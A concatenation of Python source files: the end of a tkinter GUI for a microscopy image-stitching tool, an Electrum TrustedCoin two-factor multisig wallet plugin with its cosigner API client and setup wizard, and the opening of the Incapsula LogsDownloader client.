record = self.log_queue.get(block=False)
except queue.Empty:
break
else:
self.display(record)
self.master.after(100, self.poll_log_queue)
class Gui:
def __init__(self, master):
self.master = master
frame = tk.Frame(master)
self.font = font.Font()
# ***** Menu *****
menu = tk.Menu(master)
master.config(menu=menu)
file_menu = tk.Menu(menu)
edit_menu = tk.Menu(menu)
menu.add_cascade(label='File', menu=file_menu)
# file_menu.add_separator()
file_menu.add_command(label='Quit', command=frame.quit)
menu.add_cascade(label='Edit', menu=edit_menu)
edit_menu.add_command(label='Reset to default', command=self.reset_parameters)
# ***** User Inputs *****
file_picker_label = tk.Label(master, text='Project folder:')
self.project_path = tk.StringVar()
self.file_picker_entry = tk.Entry(master, textvariable=self.project_path, width=30)
file_picker_button = tk.Button(master, text='Choose Directory', command=self.ask_for_path)
file_picker_label.grid(row=0, column=0, sticky=tk.E, pady=(10, 0), padx=(25,5))
self.file_picker_entry.grid(row=0, column=1, sticky=tk.W, pady=(10, 0))
file_picker_button.grid(row=0, column=2, sticky=tk.W, pady=(10, 0))
self.classifier_input = tk.BooleanVar()
tk.Checkbutton(master, text='Load input from classifier', variable=self.classifier_input,
command=self.display_csv_picker).grid(row=1, column=1, pady=(6, 0), sticky=tk.W)
self.csv_picker_label = tk.Label(master, text='Classifier CSV file:')
self.csv_path = tk.StringVar()
self.csv_picker_entry = tk.Entry(master, textvariable=self.csv_path, width=30)
self.csv_picker_button = tk.Button(master, text='Choose CSV file', command=self.ask_for_file)
grid_pos = 4
tk.Label(master, text='Advanced Options', font=(self.font, 14, 'bold')).grid(row=grid_pos, column=1,
pady=(20, 0), sticky=tk.W)
# TODO: Find out how to hide advanced options by default
self.output_folder = tk.StringVar()
tk.Label(master, text='Output folder name images:').grid(row=grid_pos + 1, column=0, sticky=tk.E, padx=(25,5))
tk.Entry(master, textvariable=self.output_folder).grid(row=grid_pos + 1, column=1, sticky=tk.W)
self.csv_folder_name = tk.StringVar()
tk.Label(master, text='Output folder name CSVs:').grid(row=grid_pos + 2, column=0, sticky=tk.E, padx=(25,5))
tk.Entry(master, textvariable=self.csv_folder_name).grid(row=grid_pos + 2, column=1, sticky=tk.W)
self.max_processes = tk.IntVar()
tk.Label(master, text='Number of parallel processes:').grid(row=grid_pos + 3, column=0, sticky=tk.E, padx=(25,5))
tk.Entry(master, textvariable=self.max_processes).grid(row=grid_pos + 3, column=1, sticky=tk.W)
self.batch_size = tk.IntVar()
tk.Label(master, text='Batch size:').grid(row=grid_pos + 4, column=0, sticky=tk.E, padx=(25,5))
tk.Entry(master, textvariable=self.batch_size).grid(row=grid_pos + 4, column=1, sticky=tk.W)
self.highmag_layer = tk.StringVar()
tk.Label(master, text='MAPS high magnification layer:').grid(row=grid_pos + 5, column=0, sticky=tk.E, padx=(25,5))
tk.Entry(master, textvariable=self.highmag_layer).grid(row=grid_pos + 5, column=1, sticky=tk.W)
self.stitch_threshold = tk.IntVar()
tk.Label(master, text='Stitch threshold:').grid(row=grid_pos + 6, column=0, sticky=tk.E, padx=(25,5))
tk.Entry(master, textvariable=self.stitch_threshold).grid(row=grid_pos + 6, column=1, sticky=tk.W)
self.eight_bit = tk.BooleanVar()
tk.Checkbutton(master, text='8 bit output', variable=self.eight_bit).grid(row=grid_pos + 7, column=1, sticky=tk.W)
self.arrow_overlay = tk.BooleanVar()
tk.Checkbutton(master, text='Add an arrow overlay that points to the fork', variable=self.arrow_overlay). \
grid(row=grid_pos + 8, column=1, sticky=tk.W)
self.contrast_enhance = tk.BooleanVar()
tk.Checkbutton(master, text='Produce contrast enhanced images', variable=self.contrast_enhance). \
grid(row=grid_pos + 9, column=1, sticky=tk.W)
self.continue_processing = tk.BooleanVar()
tk.Checkbutton(master, text='Continue processing an experiment', variable=self.continue_processing).\
grid(row=grid_pos + 10, column=1, sticky=tk.W)
# Run button
self.run_button_text = tk.StringVar()
self.run_button = tk.Button(master, textvariable=self.run_button_text, width=10)
self.run_button_ready()
self.run_button.grid(row=15, column=2, sticky=tk.W, pady=10, padx=10)
# Reset button
self.reset_button = tk.Button(master, text='Reset Parameters', width=20, command=self.reset_parameters)
self.reset_button.grid(row=15, column=0, sticky=tk.E, pady=10, padx=10)
# Stop button (available during run)
self.reset_parameters()
def reset_parameters(self):
self.project_path.set('')
self.max_processes.set(5)
self.eight_bit.set(True)
self.batch_size.set(5)
self.output_folder.set('stitchedForks')
self.csv_folder_name.set('annotations')
self.highmag_layer.set('highmag')
self.stitch_threshold.set(1000)
self.arrow_overlay.set(True)
self.contrast_enhance.set(True)
self.continue_processing.set(False)
self.classifier_input.set(False)
self.csv_path.set('')
def run(self):
project_dir = Path(self.project_path.get())
base_path = project_dir.parent
project_name = project_dir.name
params_set = self.check_all_parameters_set()
if params_set and not self.continue_processing.get() and not self.classifier_input.get():
self.create_logging_window()
self.run_button_to_running()
log_file_path = str(Path(project_dir) / (project_name + '.log'))
logger = MapsXmlParser.create_logger(log_file_path)
logger.info('Process experiment {}'.format(project_name))
# thread = threading.Thread(target=self.dummy, args=(10, ))
# thread.daemon = True
# thread.start()
thread = threading.Thread(target=self.run_from_beginning, args=(base_path, project_name,))
thread.daemon = True
thread.start()
elif params_set and self.continue_processing.get():
self.create_logging_window()
self.run_button_to_running()
logging.info('Continuing to process experiment {}'.format(project_name))
thread = threading.Thread(target=self.continue_run, args=(base_path, project_name,))
thread.daemon = True
thread.start()
elif params_set and self.classifier_input.get():
self.create_logging_window()
self.run_button_to_running()
logging.info('Load classifier output for experiment {} from the csv file: {}'.format(project_name,
self.csv_path.get()))
thread = threading.Thread(target=self.classifier_input_run, args=(base_path, project_name,
self.csv_path.get(),))
thread.daemon = True
thread.start()
else:
tkinter.messagebox.showwarning(title='Warning: parameters missing',
message='You need to enter the correct kind of parameters in all the '
'required fields and then try again')
def run_button_to_running(self):
self.run_button_text.set('Running...')
self.run_button.config(height=2, fg='gray', command=self.nothing)
def run_button_ready(self):
self.run_button_text.set('Run')
self.run_button.config(height=2, fg='green', command=self.run, font=(self.font, 24, 'bold'))
def run_from_beginning(self, base_path, project_name):
# TODO: Catch issues when wrong path is provided or another error/warning occurs in the stitcher => catch my custom Exception, display it to the user
stitcher = Stitcher(base_path, project_name, self.csv_folder_name.get(), self.output_folder.get())
stitcher.parse_create_csv_batches(batch_size=self.batch_size.get(), highmag_layer=self.highmag_layer.get())
stitcher.manage_batches(self.stitch_threshold.get(), self.eight_bit.get(), show_arrow=self.arrow_overlay.get(),
max_processes=self.max_processes.get(), enhance_contrast=self.contrast_enhance.get())
stitcher.combine_csvs(delete_batches=True)
logging.info('Finished processing the experiment')
self.run_button_ready()
def continue_run(self, base_path, project_name):
stitcher = Stitcher(base_path, project_name, self.csv_folder_name.get(), self.output_folder.get())
stitcher.manage_batches(self.stitch_threshold.get(), self.eight_bit.get(), show_arrow=self.arrow_overlay.get(),
max_processes=self.max_processes.get(), enhance_contrast=self.contrast_enhance.get())
stitcher.combine_csvs(delete_batches=True)
logging.info('Finished processing the experiment')
self.run_button_ready()
def classifier_input_run(self, base_path, project_name, csv_path):
stitcher = Stitcher(base_path, project_name, self.csv_folder_name.get(), self.output_folder.get())
stitcher.parse_create_classifier_csv_batches(batch_size=self.batch_size.get(), classifier_csv_path=csv_path,
highmag_layer=self.highmag_layer.get())
stitcher.manage_batches(self.stitch_threshold.get(), self.eight_bit.get(), show_arrow=self.arrow_overlay.get(),
max_processes=self.max_processes.get(), enhance_contrast=self.contrast_enhance.get())
stitcher.combine_csvs(delete_batches=True)
logging.info('Finished processing the experiment')
self.run_button_ready()
def create_logging_window(self):
# TODO: Check if the window already exists. Only make a new window if it doesn't exist yet
log_window = tk.Toplevel(self.master)
log_window.title('Log')
LoggingWindow(log_window)
def dummy(self, iterations):
"""Dummy run function to test the interface, e.g. locally on my Mac
Function just does some logging so that the interface can be tested.
Args:
iterations (int): Number of log messages to be produced
"""
logger = logging.getLogger(__name__)
for i in range(iterations):
logger.info('Running Dummy')
time.sleep(1)
for i in range(iterations):
logger.info('Running Dummy 2! =D')
time.sleep(1)
self.run_button_ready()
@staticmethod
def nothing():
"""If the run button has already been pressed, just do nothing on future presses until the function finishes
"""
pass
def ask_for_path(self):
path = tkinter.filedialog.askdirectory(title='Select folder containing the MapsProject.xml file')
self.project_path.set(path)
def ask_for_file(self):
path = tkinter.filedialog.askopenfilename(title='Select the classifier output',
filetypes=(("csv files", "*.csv"), ("all files", "*.*")))
self.csv_path.set(path)
def display_csv_picker(self):
if self.classifier_input.get():
self.csv_picker_label.grid(row=2, column=0, sticky=tk.E)
self.csv_picker_entry.grid(row=2, column=1, sticky=tk.W)
self.csv_picker_button.grid(row=2, column=2, sticky=tk.W)
else:
self.csv_picker_label.grid_remove()
self.csv_picker_entry.grid_remove()
self.csv_picker_button.grid_remove()
def check_all_parameters_set(self):
try:
params_set = len(self.project_path.get()) > 0
params_set = params_set and type(self.max_processes.get()) == int
params_set = params_set and type(self.eight_bit.get()) == bool
params_set = params_set and type(self.batch_size.get()) == int
params_set = params_set and len(self.output_folder.get()) > 0
params_set = params_set and len(self.csv_folder_name.get()) > 0
params_set = params_set and len(self.highmag_layer.get()) > 0
params_set = params_set and type(self.stitch_threshold.get()) == int
if self.classifier_input.get():
params_set = params_set and len(self.csv_path.get()) > 0
params_set = params_set and self.csv_path.get().endswith('.csv')
except _tkinter.TclError:
params_set = False
return params_set
def shutdown(self):
# Helper function to shut down all stitching processes when the interface is quit
if tk.messagebox.askokcancel("Quit", "Do you want to stop processing the experiment?"):
self.master.destroy()
|
trustedcoin.py
|
#!/usr/bin/env python3
#
# Electrum - Lightweight Bitcoin Client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import socket
import os
import requests
import json
from urllib.parse import urljoin
from urllib.parse import quote
import electrumpq
from electrum import bitcoin
from electrum import constants
from electrum import keystore
from electrumpq.bitcoin import *
from electrumpq.mnemonic import Mnemonic
from electrum import version
from electrumpq.wallet import Multisig_Wallet, Deterministic_Wallet
from electrumpq.i18n import _
from electrumpq.plugins import BasePlugin, hook
from electrumpq.util import NotEnoughFunds
from electrumpq.storage import STO_EV_USER_PW
# signing_xpub is hardcoded so that the wallet can be restored from seed, without TrustedCoin's server
def get_signing_xpub():
if constants.net.TESTNET:
return "tpubD6NzVbkrYhZ4XdmyJQcCPjQfg6RXVUzGFhPjZ7uvRC8JLcS7Hw1i7UTpyhp9grHpak4TyK2hzBJrujDVLXQ6qB5tNpVx9rC6ixijUXadnmY"
else:
return "xpub661MyMwAqRbcGnMkaTx2594P9EDuiEqMq25PM2aeG6UmwzaohgA6uDmNsvSUV8ubqwA3Wpste1hg69XHgjUuCD5HLcEp2QPzyV1HMrPppsL"
def get_billing_xpub():
if constants.net.TESTNET:
return "tpubD6NzVbkrYhZ4X11EJFTJujsYbUmVASAYY7gXsEt4sL97AMBdypiH1E9ZVTpdXXEy3Kj9Eqd1UkxdGtvDt5z23DKsh6211CfNJo8bLLyem5r"
else:
return "xpub6DTBdtBB8qUmH5c77v8qVGVoYk7WjJNpGvutqjLasNG1mbux6KsojaLrYf2sRhXAVU4NaFuHhbD9SvVPRt1MB1MaMooRuhHcAZH1yhQ1qDU"
SEED_PREFIX = version.SEED_PREFIX_2FA
DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"It uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. To use this service, you will need a smartphone with "
"Google Authenticator installed."),
_("A small fee will be charged on each transaction that uses the "
"remote server. You may check and modify your billing preferences "
"once the installation is complete."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
_("The next step will generate the seed of your wallet. This seed will "
"NOT be saved in your computer, and it must be stored on paper. "
"To be safe from malware, you may want to do this on an offline "
"computer, and move your wallet later to an online computer."),
]
RESTORE_MSG = _("Enter the seed for your 2-factor wallet:")
class TrustedCoinException(Exception):
def __init__(self, message, status_code=0):
Exception.__init__(self, message)
self.status_code = status_code
class TrustedCoinCosignerClient(object):
def __init__(self, user_agent=None, base_url='https://api.trustedcoin.com/2/'):
self.base_url = base_url
self.debug = False
self.user_agent = user_agent
def send_request(self, method, relative_url, data=None):
kwargs = {'headers': {}}
if self.user_agent:
kwargs['headers']['user-agent'] = self.user_agent
if method == 'get' and data:
kwargs['params'] = data
elif method == 'post' and data:
kwargs['data'] = json.dumps(data)
kwargs['headers']['content-type'] = 'application/json'
url = urljoin(self.base_url, relative_url)
if self.debug:
print('%s %s %s' % (method, url, data))
response = requests.request(method, url, **kwargs)
if self.debug:
print(response.text)
if response.status_code != 200:
message = str(response.text)
if response.headers.get('content-type') == 'application/json':
r = response.json()
if 'message' in r:
message = r['message']
raise TrustedCoinException(message, response.status_code)
if response.headers.get('content-type') == 'application/json':
return response.json()
else:
return response.text
def get_terms_of_service(self, billing_plan='electrum-per-tx-otp'):
"""
Returns the TOS for the given billing plan as a plain/text unicode string.
:param billing_plan: the plan to return the terms for
"""
payload = {'billing_plan': billing_plan}
return self.send_request('get', 'tos', payload)
def create(self, xpubkey1, xpubkey2, email, billing_plan='electrum-per-tx-otp'):
"""
Creates a new cosigner resource.
:param xpubkey1: a bip32 extended public key (customarily the hot key)
:param xpubkey2: a bip32 extended public key (customarily the cold key)
:param email: a contact email
:param billing_plan: the billing plan for the cosigner
"""
payload = {
'email': email,
'xpubkey1': xpubkey1,
'xpubkey2': xpubkey2,
'billing_plan': billing_plan,
}
return self.send_request('post', 'cosigner', payload)
def auth(self, id, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param otp: the one time password
"""
payload = {'otp': otp}
return self.send_request('post', 'cosigner/%s/auth' % quote(id), payload)
def get(self, id):
""" Get billing info """
return self.send_request('get', 'cosigner/%s' % quote(id))
def get_challenge(self, id):
""" Get challenge to reset Google Auth secret """
return self.send_request('get', 'cosigner/%s/otp_secret' % quote(id))
def reset_auth(self, id, challenge, signatures):
""" Reset Google Auth secret """
payload = {'challenge':challenge, 'signatures':signatures}
return self.send_request('post', 'cosigner/%s/otp_secret' % quote(id), payload)
def sign(self, id, transaction, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param transaction: the hex encoded [partially signed] compact transaction to sign
:param otp: the one time password
"""
payload = {
'otp': otp,
'transaction': transaction
}
return self.send_request('post', 'cosigner/%s/sign' % quote(id), payload)
def transfer_credit(self, id, recipient, otp, signature_callback):
"""
Transfer a cosigner's credits to another cosigner.
:param id: the id of the sending cosigner
:param recipient: the id of the recipient cosigner
:param otp: the one time password (of the sender)
:param signature_callback: a callback that signs a text message using xpubkey1/0/0 returning a compact sig
"""
payload = {
'otp': otp,
'recipient': recipient,
'timestamp': int(time.time()),
}
relative_url = 'cosigner/%s/transfer' % quote(id)
full_url = urljoin(self.base_url, relative_url)
headers = {
'x-signature': signature_callback(full_url + '\n' + json.dumps(payload))
}
return self.send_request('post', relative_url, payload, headers)
server = TrustedCoinCosignerClient(user_agent="Electrum/" + version.ELECTRUM_VERSION)
class Wallet_2fa(Multisig_Wallet):
wallet_type = '2fa'
def __init__(self, storage):
self.m, self.n = 2, 3
Deterministic_Wallet.__init__(self, storage)
self.is_billing = False
self.billing_info = None
def can_sign_without_server(self):
return not self.keystores['x2/'].is_watching_only()
def get_user_id(self):
return get_user_id(self.storage)
def min_prepay(self):
return min(self.price_per_tx.keys())
def num_prepay(self, config):
default = self.min_prepay()
n = config.get('trustedcoin_prepay', default)
if n not in self.price_per_tx:
n = default
return n
def extra_fee(self, config):
if self.can_sign_without_server():
return 0
if self.billing_info is None:
self.plugin.start_request_thread(self)
return 0
if self.billing_info.get('tx_remaining'):
return 0
if self.is_billing:
return 0
n = self.num_prepay(config)
price = int(self.price_per_tx[n])
assert price <= 100000 * n
return price
def make_unsigned_transaction(self, coins, outputs, config, fixed_fee=None,
change_addr=None, is_sweep=False):
mk_tx = lambda o: Multisig_Wallet.make_unsigned_transaction(
self, coins, o, config, fixed_fee, change_addr)
fee = self.extra_fee(config) if not is_sweep else 0
if fee:
address = self.billing_info['billing_address']
fee_output = (TYPE_ADDRESS, address, fee)
try:
tx = mk_tx(outputs + [fee_output])
except NotEnoughFunds:
# TrustedCoin won't charge if the total inputs is
# lower than their fee
tx = mk_tx(outputs)
if tx.input_value() >= fee:
raise
self.print_error("not charging for this tx")
else:
tx = mk_tx(outputs)
return tx
def sign_transaction(self, tx, password):
Multisig_Wallet.sign_transaction(self, tx, password)
if tx.is_complete():
return
if not self.auth_code:
self.print_error("sign_transaction: no auth code")
return
long_user_id, short_id = self.get_user_id()
tx_dict = tx.as_dict()
raw_tx = tx_dict["hex"]
r = server.sign(short_id, raw_tx, self.auth_code)
if r:
raw_tx = r.get('transaction')
tx.update(raw_tx)
self.print_error("twofactor: is complete", tx.is_complete())
# reset billing_info
self.billing_info = None
# Utility functions
def get_user_id(storage):
def make_long_id(xpub_hot, xpub_cold):
return bitcoin.sha256(''.join(sorted([xpub_hot, xpub_cold])))
xpub1 = storage.get('x1/')['xpub']
xpub2 = storage.get('x2/')['xpub']
long_id = make_long_id(xpub1, xpub2)
short_id = hashlib.sha256(long_id).hexdigest()
return long_id, short_id
def make_xpub(xpub, s):
version, _, _, _, c, cK = deserialize_xpub(xpub)
cK2, c2 = bitcoin._CKD_pub(cK, c, s)
return bitcoin.serialize_xpub(version, c2, cK2)
def make_billing_address(wallet, num):
long_id, short_id = wallet.get_user_id()
xpub = make_xpub(get_billing_xpub(), long_id)
version, _, _, _, c, cK = deserialize_xpub(xpub)
cK, c = bitcoin.CKD_pub(cK, c, num)
return bitcoin.public_key_to_p2pkh(cK)
class TrustedCoinPlugin(BasePlugin):
wallet_class = Wallet_2fa
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.wallet_class.plugin = self
self.requesting = False
@staticmethod
def is_valid_seed(seed):
return bitcoin.is_new_seed(seed, SEED_PREFIX)
def is_available(self):
return True
def is_enabled(self):
return True
def can_user_disable(self):
return False
@hook
def get_tx_extra_fee(self, wallet, tx):
if type(wallet) != Wallet_2fa:
return
if wallet.billing_info is None:
assert wallet.can_sign_without_server()
return None
address = wallet.billing_info['billing_address']
for _type, addr, amount in tx.outputs():
if _type == TYPE_ADDRESS and addr == address:
return address, amount
def request_billing_info(self, wallet):
if wallet.can_sign_without_server():
return
self.print_error("request billing info")
billing_info = server.get(wallet.get_user_id()[1])
billing_address = make_billing_address(wallet, billing_info['billing_index'])
assert billing_address == billing_info['billing_address']
wallet.billing_info = billing_info
wallet.price_per_tx = dict(billing_info['price_per_tx'])
wallet.price_per_tx.pop(1)
self.requesting = False
return True
def start_request_thread(self, wallet):
from threading import Thread
if self.requesting is False:
self.requesting = True
t = Thread(target=self.request_billing_info, args=(wallet,))
t.setDaemon(True)
t.start()
return t
def make_seed(self):
return Mnemonic('english').make_seed(seed_type='2fa', num_bits=128)
@hook
def do_clear(self, window):
window.wallet.is_billing = False
def show_disclaimer(self, wizard):
wizard.set_icon(':icons/trustedcoin-wizard.png')
wizard.stack = []
wizard.confirm_dialog(title='Disclaimer', message='\n\n'.join(DISCLAIMER), run_next = lambda x: wizard.run('choose_seed'))
def choose_seed(self, wizard):
title = _('Create or restore')
message = _('Do you want to create a new seed, or to restore a wallet using an existing seed?')
choices = [
('create_seed', _('Create a new seed')),
('restore_wallet', _('I already have a seed')),
]
wizard.choice_dialog(title=title, message=message, choices=choices, run_next=wizard.run)
def create_seed(self, wizard):
seed = self.make_seed()
f = lambda x: wizard.request_passphrase(seed, x)
wizard.show_seed_dialog(run_next=f, seed_text=seed)
@classmethod
def get_xkeys(self, seed, passphrase, derivation):
from electrumpq.mnemonic import Mnemonic
from electrumpq.keystore import bip32_root, bip32_private_derivation
bip32_seed = Mnemonic.mnemonic_to_seed(seed, passphrase)
xprv, xpub = bip32_root(bip32_seed, 'standard')
xprv, xpub = bip32_private_derivation(xprv, "m/", derivation)
return xprv, xpub
@classmethod
def xkeys_from_seed(self, seed, passphrase):
words = seed.split()
n = len(words)
# old version use long seed phrases
if n >= 24:
assert passphrase == ''
xprv1, xpub1 = self.get_xkeys(' '.join(words[0:12]), '', "m/")
xprv2, xpub2 = self.get_xkeys(' '.join(words[12:]), '', "m/")
elif n==12:
xprv1, xpub1 = self.get_xkeys(seed, passphrase, "m/0'/")
xprv2, xpub2 = self.get_xkeys(seed, passphrase, "m/1'/")
else:
raise Exception('unrecognized seed length: {} words'.format(n))
return xprv1, xpub1, xprv2, xpub2
def create_keystore(self, wizard, seed, passphrase):
# this overloads the wizard's method
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xpub(xpub2)
wizard.request_password(run_next=lambda pw, encrypt: self.on_password(wizard, pw, encrypt, k1, k2))
def on_password(self, wizard, password, encrypt_storage, k1, k2):
k1.update_password(None, password)
wizard.storage.set_keystore_encryption(bool(password))
if encrypt_storage:
wizard.storage.set_password(password, enc_version=STO_EV_USER_PW)
wizard.storage.put('x1/', k1.dump())
wizard.storage.put('x2/', k2.dump())
wizard.storage.write()
msg = [
_("Your wallet file is: {}.").format(os.path.abspath(wizard.storage.path)),
_("You need to be online in order to complete the creation of "
"your wallet. If you generated your seed on an offline "
'computer, click on "{}" to close this window, move your '
"wallet file to an online computer, and reopen it with "
"Electrum.").format(_('Cancel')),
_('If you are online, click on "{}" to continue.').format(_('Next'))
]
msg = '\n\n'.join(msg)
wizard.stack = []
wizard.confirm_dialog(title='', message=msg, run_next = lambda x: wizard.run('create_remote_key'))
def restore_wallet(self, wizard):
wizard.opt_bip39 = False
wizard.opt_ext = True
title = _("Restore two-factor Wallet")
f = lambda seed, is_bip39, is_ext: wizard.run('on_restore_seed', seed, is_ext)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_restore_seed(self, wizard, seed, is_ext):
f = lambda x: self.restore_choice(wizard, seed, x)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def restore_choice(self, wizard, seed, passphrase):
wizard.set_icon(':icons/trustedcoin-wizard.png')
wizard.stack = []
title = _('Restore 2FA wallet')
msg = ' '.join([
'You are going to restore a wallet protected with two-factor authentication.',
'Do you want to keep using two-factor authentication with this wallet,',
'or do you want to disable it, and have two master private keys in your wallet?'
])
choices = [('keep', 'Keep'), ('disable', 'Disable')]
f = lambda x: self.on_choice(wizard, seed, passphrase, x)
wizard.choice_dialog(choices=choices, message=msg, title=title, run_next=f)
def on_choice(self, wizard, seed, passphrase, x):
if x == 'disable':
f = lambda pw, encrypt: wizard.run('on_restore_pw', seed, passphrase, pw, encrypt)
wizard.request_password(run_next=f)
else:
self.create_keystore(wizard, seed, passphrase)
def on_restore_pw(self, wizard, seed, passphrase, password, encrypt_storage):
storage = wizard.storage
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xprv(xprv2)
k1.add_seed(seed)
k1.update_password(None, password)
k2.update_password(None, password)
storage.put('x1/', k1.dump())
storage.put('x2/', k2.dump())
long_user_id, short_id = get_user_id(storage)
xpub3 = make_xpub(get_signing_xpub(), long_user_id)
k3 = keystore.from_xpub(xpub3)
storage.put('x3/', k3.dump())
storage.set_keystore_encryption(bool(password))
if encrypt_storage:
storage.set_password(password, enc_version=STO_EV_USER_PW)
wizard.wallet = Wallet_2fa(storage)
wizard.create_addresses()
def create_remote_key(self, wizard):
email = self.accept_terms_of_use(wizard)
xpub1 = wizard.storage.get('x1/')['xpub']
xpub2 = wizard.storage.get('x2/')['xpub']
# Generate third key deterministically.
long_user_id, short_id = get_user_id(wizard.storage)
xpub3 = make_xpub(get_signing_xpub(), long_user_id)
# secret must be sent by the server
try:
r = server.create(xpub1, xpub2, email)
except socket.error:
wizard.show_message('Server not reachable, aborting')
return
except TrustedCoinException as e:
if e.status_code == 409:
r = None
else:
wizard.show_message(str(e))
return
if r is None:
otp_secret = None
else:
otp_secret = r.get('otp_secret')
if not otp_secret:
wizard.show_message(_('Error'))
return
_xpub3 = r['xpubkey_cosigner']
_id = r['id']
try:
assert _id == short_id, ("user id error", _id, short_id)
assert xpub3 == _xpub3, ("xpub3 error", xpub3, _xpub3)
except Exception as e:
wizard.show_message(str(e))
return
self.check_otp(wizard, short_id, otp_secret, xpub3)
def check_otp(self, wizard, short_id, otp_secret, xpub3):
otp, reset = self.request_otp_dialog(wizard, short_id, otp_secret)
if otp:
self.do_auth(wizard, short_id, otp, xpub3)
elif reset:
wizard.opt_bip39 = False
wizard.opt_ext = True
f = lambda seed, is_bip39, is_ext: wizard.run('on_reset_seed', short_id, seed, is_ext, xpub3)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_reset_seed(self, wizard, short_id, seed, is_ext, xpub3):
f = lambda passphrase: wizard.run('on_reset_auth', short_id, seed, passphrase, xpub3)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def do_auth(self, wizard, short_id, otp, xpub3):
try:
server.auth(short_id, otp)
except:
wizard.show_message(_('Incorrect password'))
return
k3 = keystore.from_xpub(xpub3)
wizard.storage.put('x3/', k3.dump())
wizard.storage.put('use_trustedcoin', True)
wizard.storage.write()
wizard.wallet = Wallet_2fa(wizard.storage)
wizard.run('create_addresses')
def on_reset_auth(self, wizard, short_id, seed, passphrase, xpub3):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
try:
assert xpub1 == wizard.storage.get('x1/')['xpub']
assert xpub2 == wizard.storage.get('x2/')['xpub']
except:
wizard.show_message(_('Incorrect seed'))
return
r = server.get_challenge(short_id)
challenge = r.get('challenge')
message = 'TRUSTEDCOIN CHALLENGE: ' + challenge
def f(xprv):
_, _, _, _, c, k = deserialize_xprv(xprv)
pk = bip32_private_key([0, 0], k, c)
key = regenerate_key(pk)
sig = key.sign_message(message, True)
return base64.b64encode(sig).decode()
signatures = [f(x) for x in [xprv1, xprv2]]
r = server.reset_auth(short_id, challenge, signatures)
new_secret = r.get('otp_secret')
if not new_secret:
wizard.show_message(_('Request rejected by server'))
return
self.check_otp(wizard, short_id, new_secret, xpub3)
@hook
def get_action(self, storage):
if storage.get('wallet_type') != '2fa':
return
if not storage.get('x1/'):
return self, 'show_disclaimer'
if not storage.get('x2/'):
return self, 'show_disclaimer'
if not storage.get('x3/'):
return self, 'create_remote_key'
|
LogsDownloader.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Author: Doron Lehmann, Incapsula, Inc.
# Date: 2015
# Description: Logs Downloader Client
#
# ************************************************************************************
# Copyright (c) 2015, Incapsula, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# ************************************************************************************
#
import configparser
import base64
import getopt
import hashlib
import logging
import os
import platform
import re
import signal
import sys
import threading
import time
import traceback
import ssl
import urllib3
import zlib
from logging import handlers
import socket
import M2Crypto
from Crypto.Cipher import AES
"""
Main class for downloading log files
"""
class LogsDownloader:
# the LogsDownloader will run until external termination
running = True
def __init__(self, config_path, system_log_path, log_level):
# Add by Maytee Sittipornchaisakul
# set default output syslog
self.setOutputSyslogHandler = False
# set a log file for the downloader
self.logger = logging.getLogger("logsDownloader")
# default log directory for the downloader
log_dir = system_log_path
# create the log directory if needed
if not os.path.exists(log_dir):
os.makedirs(log_dir)
